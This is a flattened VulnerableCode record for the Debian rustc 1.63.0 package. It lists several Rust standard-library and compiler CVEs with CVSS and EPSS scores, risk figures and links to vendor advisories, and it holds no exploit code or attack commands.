reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX/
reference_id BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BK32QZLHDC2OVLPKTUHNT2G3VHWHD4LX/
11
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ/
reference_id C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C63NH72Q7UHJM5V3IVYRI7LVBGGFQMSQ/
12
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CKGTACKMKAPRDPWPTU26GYWBELIRFF5N/
reference_id CKGTACKMKAPRDPWPTU26GYWBELIRFF5N
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CKGTACKMKAPRDPWPTU26GYWBELIRFF5N/
13
reference_url https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html
reference_id cve-2022-21658.html
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html
14
reference_url https://github.com/rust-lang/rust/security/advisories/GHSA-r9cc-f5pr-p3j2
reference_id GHSA-r9cc-f5pr-p3j2
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://github.com/rust-lang/rust/security/advisories/GHSA-r9cc-f5pr-p3j2
15
reference_url https://security.gentoo.org/glsa/202210-09
reference_id GLSA-202210-09
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://security.gentoo.org/glsa/202210-09
16
reference_url https://support.apple.com/kb/HT213182
reference_id HT213182
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://support.apple.com/kb/HT213182
17
reference_url https://support.apple.com/kb/HT213183
reference_id HT213183
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://support.apple.com/kb/HT213183
18
reference_url https://support.apple.com/kb/HT213186
reference_id HT213186
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://support.apple.com/kb/HT213186
19
reference_url https://support.apple.com/kb/HT213193
reference_id HT213193
reference_type
scores
0
value 7.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-22T15:52:12Z/
url https://support.apple.com/kb/HT213193
20
reference_url https://access.redhat.com/errata/RHSA-2022:1894
reference_id RHSA-2022:1894
reference_type
scores
url https://access.redhat.com/errata/RHSA-2022:1894
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2022-21658
risk_score 3.3
exploitability 0.5
weighted_severity 6.6
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-j9kg-rd4y-y7by
7
url VCID-pbjz-th4w-tqgb
vulnerability_id VCID-pbjz-th4w-tqgb
summary Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28879.json
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28879.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-28879
reference_id
reference_type
scores
0
value 0.011
scoring_system epss
scoring_elements 0.77984
published_at 2026-04-01T12:55:00Z
1
value 0.011
scoring_system epss
scoring_elements 0.78123
published_at 2026-04-29T12:55:00Z
2
value 0.011
scoring_system epss
scoring_elements 0.78102
published_at 2026-04-24T12:55:00Z
3
value 0.011
scoring_system epss
scoring_elements 0.78109
published_at 2026-04-26T12:55:00Z
4
value 0.011
scoring_system epss
scoring_elements 0.77992
published_at 2026-04-02T12:55:00Z
5
value 0.011
scoring_system epss
scoring_elements 0.78022
published_at 2026-04-04T12:55:00Z
6
value 0.011
scoring_system epss
scoring_elements 0.78004
published_at 2026-04-07T12:55:00Z
7
value 0.011
scoring_system epss
scoring_elements 0.7803
published_at 2026-04-08T12:55:00Z
8
value 0.011
scoring_system epss
scoring_elements 0.78035
published_at 2026-04-09T12:55:00Z
9
value 0.011
scoring_system epss
scoring_elements 0.78061
published_at 2026-04-11T12:55:00Z
10
value 0.011
scoring_system epss
scoring_elements 0.78044
published_at 2026-04-12T12:55:00Z
11
value 0.011
scoring_system epss
scoring_elements 0.78041
published_at 2026-04-13T12:55:00Z
12
value 0.011
scoring_system epss
scoring_elements 0.78077
published_at 2026-04-16T12:55:00Z
13
value 0.011
scoring_system epss
scoring_elements 0.78075
published_at 2026-04-18T12:55:00Z
14
value 0.011
scoring_system epss
scoring_elements 0.78069
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-28879
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28879
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28879
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1949211
reference_id 1949211
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1949211
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
reference_id 986803
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
6
reference_url https://security.archlinux.org/AVG-1801
reference_id AVG-1801
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1801
7
reference_url https://security.gentoo.org/glsa/202210-09
reference_id GLSA-202210-09
reference_type
scores
url https://security.gentoo.org/glsa/202210-09
8
reference_url https://access.redhat.com/errata/RHSA-2021:3042
reference_id RHSA-2021:3042
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3042
9
reference_url https://access.redhat.com/errata/RHSA-2021:3063
reference_id RHSA-2021:3063
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3063
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2021-28879
risk_score 4.4
exploitability 0.5
weighted_severity 8.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pbjz-th4w-tqgb
8
url VCID-pvm9-wtbx-1ubx
vulnerability_id VCID-pvm9-wtbx-1ubx
summary Multiple vulnerabilities have been discovered in Rust, the worst of which could result in denial of service.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28878.json
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-28878.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-28878
reference_id
reference_type
scores
0
value 0.01012
scoring_system epss
scoring_elements 0.77065
published_at 2026-04-01T12:55:00Z
1
value 0.01012
scoring_system epss
scoring_elements 0.77216
published_at 2026-04-29T12:55:00Z
2
value 0.01012
scoring_system epss
scoring_elements 0.77195
published_at 2026-04-24T12:55:00Z
3
value 0.01012
scoring_system epss
scoring_elements 0.77202
published_at 2026-04-26T12:55:00Z
4
value 0.01012
scoring_system epss
scoring_elements 0.77071
published_at 2026-04-02T12:55:00Z
5
value 0.01012
scoring_system epss
scoring_elements 0.771
published_at 2026-04-04T12:55:00Z
6
value 0.01012
scoring_system epss
scoring_elements 0.77082
published_at 2026-04-07T12:55:00Z
7
value 0.01012
scoring_system epss
scoring_elements 0.77115
published_at 2026-04-08T12:55:00Z
8
value 0.01012
scoring_system epss
scoring_elements 0.77124
published_at 2026-04-09T12:55:00Z
9
value 0.01012
scoring_system epss
scoring_elements 0.77152
published_at 2026-04-11T12:55:00Z
10
value 0.01012
scoring_system epss
scoring_elements 0.77131
published_at 2026-04-12T12:55:00Z
11
value 0.01012
scoring_system epss
scoring_elements 0.77126
published_at 2026-04-13T12:55:00Z
12
value 0.01012
scoring_system epss
scoring_elements 0.77167
published_at 2026-04-16T12:55:00Z
13
value 0.01012
scoring_system epss
scoring_elements 0.77169
published_at 2026-04-18T12:55:00Z
14
value 0.01012
scoring_system epss
scoring_elements 0.77161
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-28878
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28878
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28878
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1949207
reference_id 1949207
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1949207
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
reference_id 986803
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
6
reference_url https://security.archlinux.org/AVG-1801
reference_id AVG-1801
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1801
7
reference_url https://security.gentoo.org/glsa/202210-09
reference_id GLSA-202210-09
reference_type
scores
url https://security.gentoo.org/glsa/202210-09
8
reference_url https://access.redhat.com/errata/RHSA-2021:3042
reference_id RHSA-2021:3042
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3042
9
reference_url https://access.redhat.com/errata/RHSA-2021:3063
reference_id RHSA-2021:3063
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3063
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2021-28878
risk_score 3.4
exploitability 0.5
weighted_severity 6.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pvm9-wtbx-1ubx
9
url VCID-wdu6-3vph-aqb7
vulnerability_id VCID-wdu6-3vph-aqb7
summary rust: use-after-free or double free in VecDeque::make_contiguous
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36318.json
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36318.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-36318
reference_id
reference_type
scores
0
value 0.00356
scoring_system epss
scoring_elements 0.57759
published_at 2026-04-01T12:55:00Z
1
value 0.00356
scoring_system epss
scoring_elements 0.57834
published_at 2026-04-29T12:55:00Z
2
value 0.00356
scoring_system epss
scoring_elements 0.57833
published_at 2026-04-24T12:55:00Z
3
value 0.00356
scoring_system epss
scoring_elements 0.57851
published_at 2026-04-26T12:55:00Z
4
value 0.00356
scoring_system epss
scoring_elements 0.57843
published_at 2026-04-02T12:55:00Z
5
value 0.00356
scoring_system epss
scoring_elements 0.57863
published_at 2026-04-04T12:55:00Z
6
value 0.00356
scoring_system epss
scoring_elements 0.57838
published_at 2026-04-07T12:55:00Z
7
value 0.00356
scoring_system epss
scoring_elements 0.57893
published_at 2026-04-08T12:55:00Z
8
value 0.00356
scoring_system epss
scoring_elements 0.57894
published_at 2026-04-09T12:55:00Z
9
value 0.00356
scoring_system epss
scoring_elements 0.57911
published_at 2026-04-11T12:55:00Z
10
value 0.00356
scoring_system epss
scoring_elements 0.57887
published_at 2026-04-12T12:55:00Z
11
value 0.00356
scoring_system epss
scoring_elements 0.57867
published_at 2026-04-13T12:55:00Z
12
value 0.00356
scoring_system epss
scoring_elements 0.57896
published_at 2026-04-16T12:55:00Z
13
value 0.00356
scoring_system epss
scoring_elements 0.57895
published_at 2026-04-18T12:55:00Z
14
value 0.00356
scoring_system epss
scoring_elements 0.57873
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-36318
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36318
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36318
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 7.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1949192
reference_id 1949192
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1949192
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
reference_id 986803
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
6
reference_url https://security.archlinux.org/AVG-1804
reference_id AVG-1804
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1804
7
reference_url https://access.redhat.com/errata/RHSA-2021:1935
reference_id RHSA-2021:1935
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1935
8
reference_url https://access.redhat.com/errata/RHSA-2021:2243
reference_id RHSA-2021:2243
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:2243
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2020-36318
risk_score 4.4
exploitability 0.5
weighted_severity 8.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wdu6-3vph-aqb7
10
url VCID-wpe1-jr23-duhh
vulnerability_id VCID-wpe1-jr23-duhh
summary rust: optimization for joining strings can cause uninitialized bytes to be exposed
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36323.json
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36323.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-36323
reference_id
reference_type
scores
0
value 0.00705
scoring_system epss
scoring_elements 0.72059
published_at 2026-04-01T12:55:00Z
1
value 0.00705
scoring_system epss
scoring_elements 0.72186
published_at 2026-04-29T12:55:00Z
2
value 0.00705
scoring_system epss
scoring_elements 0.72182
published_at 2026-04-24T12:55:00Z
3
value 0.00705
scoring_system epss
scoring_elements 0.72191
published_at 2026-04-26T12:55:00Z
4
value 0.00705
scoring_system epss
scoring_elements 0.72065
published_at 2026-04-02T12:55:00Z
5
value 0.00705
scoring_system epss
scoring_elements 0.72086
published_at 2026-04-04T12:55:00Z
6
value 0.00705
scoring_system epss
scoring_elements 0.72062
published_at 2026-04-07T12:55:00Z
7
value 0.00705
scoring_system epss
scoring_elements 0.72099
published_at 2026-04-08T12:55:00Z
8
value 0.00705
scoring_system epss
scoring_elements 0.72111
published_at 2026-04-09T12:55:00Z
9
value 0.00705
scoring_system epss
scoring_elements 0.72134
published_at 2026-04-11T12:55:00Z
10
value 0.00705
scoring_system epss
scoring_elements 0.72118
published_at 2026-04-12T12:55:00Z
11
value 0.00705
scoring_system epss
scoring_elements 0.72104
published_at 2026-04-13T12:55:00Z
12
value 0.00705
scoring_system epss
scoring_elements 0.72145
published_at 2026-04-16T12:55:00Z
13
value 0.00705
scoring_system epss
scoring_elements 0.72152
published_at 2026-04-18T12:55:00Z
14
value 0.00705
scoring_system epss
scoring_elements 0.72138
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-36323
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36323
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36323
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1950396
reference_id 1950396
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1950396
5
reference_url https://security.archlinux.org/AVG-1801
reference_id AVG-1801
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1801
6
reference_url https://access.redhat.com/errata/RHSA-2021:3042
reference_id RHSA-2021:3042
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3042
7
reference_url https://access.redhat.com/errata/RHSA-2021:3063
reference_id RHSA-2021:3063
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:3063
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2020-36323
risk_score 3.7
exploitability 0.5
weighted_severity 7.4
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-wpe1-jr23-duhh
11
url VCID-y25s-c64z-57a6
vulnerability_id VCID-y25s-c64z-57a6
summary rust: memory safety violation in String::retain()
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36317.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2020-36317.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2020-36317
reference_id
reference_type
scores
0
value 0.00274
scoring_system epss
scoring_elements 0.50792
published_at 2026-04-01T12:55:00Z
1
value 0.00274
scoring_system epss
scoring_elements 0.5083
published_at 2026-04-29T12:55:00Z
2
value 0.00274
scoring_system epss
scoring_elements 0.50862
published_at 2026-04-24T12:55:00Z
3
value 0.00274
scoring_system epss
scoring_elements 0.5087
published_at 2026-04-26T12:55:00Z
4
value 0.00274
scoring_system epss
scoring_elements 0.50847
published_at 2026-04-02T12:55:00Z
5
value 0.00274
scoring_system epss
scoring_elements 0.50873
published_at 2026-04-04T12:55:00Z
6
value 0.00274
scoring_system epss
scoring_elements 0.50831
published_at 2026-04-07T12:55:00Z
7
value 0.00274
scoring_system epss
scoring_elements 0.50888
published_at 2026-04-08T12:55:00Z
8
value 0.00274
scoring_system epss
scoring_elements 0.50886
published_at 2026-04-09T12:55:00Z
9
value 0.00274
scoring_system epss
scoring_elements 0.50928
published_at 2026-04-16T12:55:00Z
10
value 0.00274
scoring_system epss
scoring_elements 0.50907
published_at 2026-04-12T12:55:00Z
11
value 0.00274
scoring_system epss
scoring_elements 0.5089
published_at 2026-04-13T12:55:00Z
12
value 0.00274
scoring_system epss
scoring_elements 0.50934
published_at 2026-04-18T12:55:00Z
13
value 0.00274
scoring_system epss
scoring_elements 0.50914
published_at 2026-04-21T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2020-36317
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36317
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36317
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1949189
reference_id 1949189
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1949189
5
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
reference_id 986803
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=986803
6
reference_url https://security.archlinux.org/AVG-1804
reference_id AVG-1804
reference_type
scores
0
value Medium
scoring_system archlinux
scoring_elements
url https://security.archlinux.org/AVG-1804
7
reference_url https://access.redhat.com/errata/RHSA-2021:1935
reference_id RHSA-2021:1935
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:1935
8
reference_url https://access.redhat.com/errata/RHSA-2021:2243
reference_id RHSA-2021:2243
reference_type
scores
url https://access.redhat.com/errata/RHSA-2021:2243
fixed_packages
0
url pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
purl pkg:deb/debian/rustc@1.63.0%2Bdfsg1-2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ehdy-7aak-r3bt
1
vulnerability VCID-qj1y-b8m1-hyfm
resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2
aliases CVE-2020-36317
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y25s-c64z-57a6
Risk_score3.6
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:deb/debian/rustc@1.63.0%252Bdfsg1-2